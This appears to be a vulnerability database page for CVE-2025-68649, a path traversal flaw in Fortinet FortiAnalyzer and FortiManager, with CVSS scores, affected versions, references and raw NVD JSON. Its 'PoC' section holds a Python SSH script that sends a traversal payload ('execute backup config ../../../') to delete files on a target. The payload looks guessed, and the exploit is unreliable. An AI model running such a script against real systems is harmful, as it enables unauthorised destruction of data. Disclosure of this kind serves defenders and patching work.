CVE-2025-68649

Description

An improper limitation of a pathname to a restricted directory ('path traversal') vulnerability in Fortinet FortiAnalyzer 7.6.0 through 7.6.4, FortiAnalyzer 7.4.0 through 7.4.7, FortiAnalyzer 7.2 all versions, FortiAnalyzer 7.0 all versions, FortiAnalyzer Cloud 7.6.0 through 7.6.4, FortiAnalyzer Cloud 7.4.0 through 7.4.7, FortiAnalyzer Cloud 7.2 all versions, FortiAnalyzer Cloud 7.0 all versions, FortiManager 7.6.0 through 7.6.4, FortiManager 7.4.0 through 7.4.7, FortiManager 7.2 all versions, FortiManager 7.0 all versions, FortiManager Cloud 7.6.0 through 7.6.4, FortiManager Cloud 7.4.0 through 7.4.7, FortiManager Cloud 7.2 all versions, FortiManager Cloud 7.0 all versions may allow a privileged attacker to delete files from the underlying filesystem via crafted CLI requests.

CVSS Details

CVSS Score

6.0

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:fortinet:fortianalyzer:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:fortinet:fortianalyzer_cloud:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:fortinet:fortimanager:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:fortinet:fortimanager_cloud:*:*:*:*:*:*:*:* - VULNERABLE

FortiAnalyzer 7.6.0 - 7.6.4

FortiAnalyzer 7.4.0 - 7.4.7

FortiAnalyzer 7.2 all versions

FortiAnalyzer 7.0 all versions

FortiAnalyzer Cloud 7.6.0 - 7.6.4

FortiAnalyzer Cloud 7.4.0 - 7.4.7

FortiAnalyzer Cloud 7.2 all versions

FortiAnalyzer Cloud 7.0 all versions

FortiManager 7.6.0 - 7.6.4

FortiManager 7.4.0 - 7.4.7

FortiManager 7.2 all versions

FortiManager 7.0 all versions

FortiManager Cloud 7.6.0 - 7.6.4

FortiManager Cloud 7.4.0 - 7.4.7

FortiManager Cloud 7.2 all versions

FortiManager Cloud 7.0 all versions

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Proof of Concept for CVE-2025-68649
# This PoC demonstrates the concept of a path traversal attack via CLI.
# Requires high privileges and access to the target.

import paramiko
import sys

def send_malicious_cli(target_ip, username, password, file_to_delete):
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        print(f"[*] Connecting to {target_ip}...")
        client.connect(target_ip, username=username, password=password)
        
        # The vulnerability allows path traversal in a CLI command.
        # Constructing a path to escape the restricted directory.
        # Example: Deleting a config file from root filesystem.
        payload = f"execute backup config ../../../{file_to_delete}"
        
        print(f"[*] Sending crafted CLI request: {payload}")
        stdin, stdout, stderr = client.exec_command(payload)
        
        output = stdout.read().decode()
        error = stderr.read().decode()
        
        if output:
            print(f"[+] Command output: {output}")
        if error:
            print(f"[-] Error: {error}")
            
    except Exception as e:
        print(f"[-] An error occurred: {e}")
    finally:
        client.close()

if __name__ == "__main__":
    # Replace with actual target details
    # send_malicious_cli("192.168.1.1", "admin", "password", "system_config.db")
    pass

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-68649
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-68649
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-68649/
[4] VulDB https://vuldb.com/cve/CVE-2025-68649
[5] https://fortiguard.fortinet.com/psirt/FG-IR-26-120

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-68649", "sourceIdentifier": "[email protected]", "published": "2026-04-14T16:16:34.760", "lastModified": "2026-04-22T19:11:36.660", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An improper limitation of a pathname to a restricted directory ('path traversal') vulnerability in Fortinet FortiAnalyzer 7.6.0 through 7.6.4, FortiAnalyzer 7.4.0 through 7.4.7, FortiAnalyzer 7.2 all versions, FortiAnalyzer 7.0 all versions, FortiAnalyzer Cloud 7.6.0 through 7.6.4, FortiAnalyzer Cloud 7.4.0 through 7.4.7, FortiAnalyzer Cloud 7.2 all versions, FortiAnalyzer Cloud 7.0 all versions, FortiManager 7.6.0 through 7.6.4, FortiManager 7.4.0 through 7.4.7, FortiManager 7.2 all versions, FortiManager 7.0 all versions, FortiManager Cloud 7.6.0 through 7.6.4, FortiManager Cloud 7.4.0 through 7.4.7, FortiManager Cloud 7.2 all versions, FortiManager Cloud 7.0 all versions may allow a privileged attacker to delete files from the underlying filesystem via crafted CLI requests."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H", "baseScore": 6.0, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortianalyzer:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.4.8", "matchCriteriaId": "038D5A52-3FF2-4340-9F26-8BB373350CEE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortianalyzer:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.6.0", "versionEndExcluding": "7.6.5", "matchCriteriaId": "00645EEE-3E67-4B98-BB49-B23AD1D60B54"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortianalyzer_cloud:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.4.8", "matchCriteriaId": "3EC50E48-4E81-4087-A889-B1D2D2C8456E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortianalyzer_cloud:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.6.0", "versionEndExcluding": "7.6.5", "matchCriteriaId": "EFE9F8B4-3B5B-43FC-A286-11A5DFB43393"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortimanager:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.4.8", "matchCriteriaId": "C8CAF4D2-5763-46F9-8FB4-43674B3CD8FE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortimanager:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.6.0", "versionEndExcluding": "7.6.5", "matchCriteriaId": "9F4A9AA3-C6AA-428B-AE1B-61F61658D642"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortimanager_cloud:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.4.8", "matchCriteriaId": "810BFAE5-3F80-438B-B909-B43BC95F5AD8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortimanager_cloud:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.6.0", "versionEndExcluding": "7.6.5", "matchCriteriaId": "CBA159E6-BBE9-4630-800A-5C4B3BAF23BB"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-26-120", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}